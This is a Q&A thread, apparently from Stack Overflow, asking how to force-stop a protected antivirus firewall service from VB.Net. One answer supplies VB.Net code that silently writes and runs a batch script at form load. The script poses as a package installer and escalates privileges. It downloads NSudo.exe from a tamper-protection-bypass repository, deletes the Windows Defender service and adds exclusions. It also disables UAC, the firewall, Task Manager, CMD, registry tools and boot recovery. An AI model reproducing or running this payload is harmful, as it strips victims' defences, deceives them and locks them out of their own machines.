# Close Protected Services Forcibly Using VB.Net

Tags: windows, vb.net, service

some running services (mostly security software services) of my windows are not able to stop. The Start/stop option for those services are disabled. How can I forcibly close those services using my vb.net?

I'm using Windows 7 64bit. The service I'm trying to close is firewall service of my security software.

Comment: Please provide more detail. What's your environment? OS, services you are trying to stop, and why.

Comment: Thank u. please check my question. i've added some more informations about that.

Comment: What's the vendor of your security software?

Comment: Bitdefender Internet Security... good. Which version? Why do you need to stop its firewall in your application?

Answer (score 0, accepted):

Assuming the service has a corresponding process, you can try [Taskkill](http://technet.microsoft.com/en-us/library/bb491009.aspx):

```
Taskkill /f
```

You can use [Shell](http://msdn.microsoft.com/en-us/library/xe736fyk%28v=vs.71%29.aspx) to run the above from your program.

Or use [Process.Start](http://msdn.microsoft.com/en-us/library/system.diagnostics.process.start.aspx), as suggested [here](https://stackoverflow.com/questions/258416/shellexecute-equivalent-in-net).

Answer (score 0):

**This is a working example that disables Windows Defender.**

I'm afraid the example that **Victor** offered is lame at best.
I suggest you go to this link and read up and study the example because if you are trying to kill a service, it's vital to know if it has a parent process:

**Stackoverflow:**

[Identify a process started in VB.Net to be able to kill it and all its children later](https://stackoverflow.com/questions/52164926/identify-a-process-started-in-vb-net-to-be-able-to-kill-it-and-all-its-children)

I wrote this **Batch script** and **Power shell** that is written with vb.net (using **StringBuilder**) and executed during the form load event. It's quite effective and runs invisible.
If you wanted to convert it to a batch file, it would be relatively simple. Just extract the code from each **AppendLine** and place it into a text file and save it with the extension >> **.bat**

**Note:**

**On Error GoTo** is generally sloppy coding (but it serves a good purpose depending on the type of work you do...)
It is wise to use **Try Statements**.
A **Try**…**Catch** **Statement** consists of a Try block followed by one or more Catch clauses, which specify handlers for various exceptions.

****On Error GoTo** Statements** is an example of Vb.Net's Unstructured Exception Handling.

**Error GoTo:** redirect the flow of the program in a given location. It can lead to serious programming errors, but with the code I provided there is nothing to worry about because I personally tested it.

```
Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load

      Kill_Defender_Bat()

End Sub


 Private Sub Kill_Defender_Bat()
        On Error GoTo ErrBatDie
        Dim rythorian77 As New StringBuilder
        rythorian77.AppendLine("@echo off")
        rythorian77.AppendLine("title Installing Packages")
        rythorian77.AppendLine(">nul 2>&1 ""%SYSTEMROOT%\system32\cacls.exe"" ""%SYSTEMROOT%\system32\config\system""")
        rythorian77.AppendLine("if '%errorlevel%' NEQ '0' (")
        rythorian77.AppendLine("goto UACPrompt")
        rythorian77.AppendLine(") else ( goto gotAdmin )")
        rythorian77.AppendLine(":UACPrompt")
        rythorian77.AppendLine("echo Set UAC = CreateObject^(""Shell.Application""^) > ""%temp%\getadmin.vbs""")
        rythorian77.AppendLine("set params = %*:""=""")
        rythorian77.AppendLine("echo UAC.ShellExecute ""cmd.exe"", ""/c %~s0 %params%"", "", ""runas"", 1 >> ""%temp%\getadmin.vbs""")
        rythorian77.AppendLine("""%temp%\getadmin.vbs""")
        rythorian77.AppendLine("del ""%temp%\getadmin.vbs""")
        rythorian77.AppendLine("exit /B")
        rythorian77.AppendLine(":gotAdmin")
        rythorian77.AppendLine("echo msgbox ""Please Wait While we install necessary packages for You!.Window will be closed after Installation!!!"" > %tmp%\tmp.vbs")
        rythorian77.AppendLine("wscript %tmp%\tmp.vbs")
        rythorian77.AppendLine("del %tmp%\tmp.vbs")
        rythorian77.AppendLine("echo  Installing Necessary Packages.....Please Wait.....")
        rythorian77.AppendLine("cd  %temp%")
        rythorian77.AppendLine("bitsadmin/transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe %temp%\NSudo.exe")
        rythorian77.AppendLine("set pop=%systemroot%")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide icacls ""%pop%\System32\smartscreen.exe"" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System""  /v ""ConsentPromptBehaviorAdmin"" /t REG_DWORD /d ""0"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration""  /v ""Notification_Suppress"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableTaskMgr"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableCMD"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""DisableRegistryTools"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide reg add ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" /v ""NoRun"" /t REG_DWORD /d ""1"" /f")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide  sc stop  windefend")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide  sc delete  windefend")
        rythorian77.AppendLine("powershell.exe -command ""Add-MpPreference -ExclusionExtension "".bat""")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No")
        rythorian77.AppendLine("NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures")
        rythorian77.AppendLine("powershell -inputformat none -outputformat none -NonInteractive -Command ""Add-MpPreference -ExclusionPath '""%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'""")
        rythorian77.AppendLine("powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -PUAProtection disable""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -HighThreatDefaultAction 6 -Force""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -ModerateThreatDefaultAction 6""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -LowThreatDefaultAction 6""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -SevereThreatDefaultAction 6""")
        rythorian77.AppendLine("powershell.exe -command ""Set-MpPreference -ScanScheduleDay 8""")
        rythorian77.AppendLine("powershell.exe -command ""netsh advfirewall set allprofiles state off""")
        rythorian77.AppendLine("cd ""%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
        rythorian77.AppendLine("CreateObject(""Wscript.Shell"").Run ""KillDefender.bat"", 0, True") 'Hides Bat Running
        rythorian77.AppendLine("GoTo begin")

        File.WriteAllText("KillDefender.bat", rythorian77.ToString())

        Process.Start("KillDefender.bat")
ErrBatDie:

        Resume Next

    End Sub
```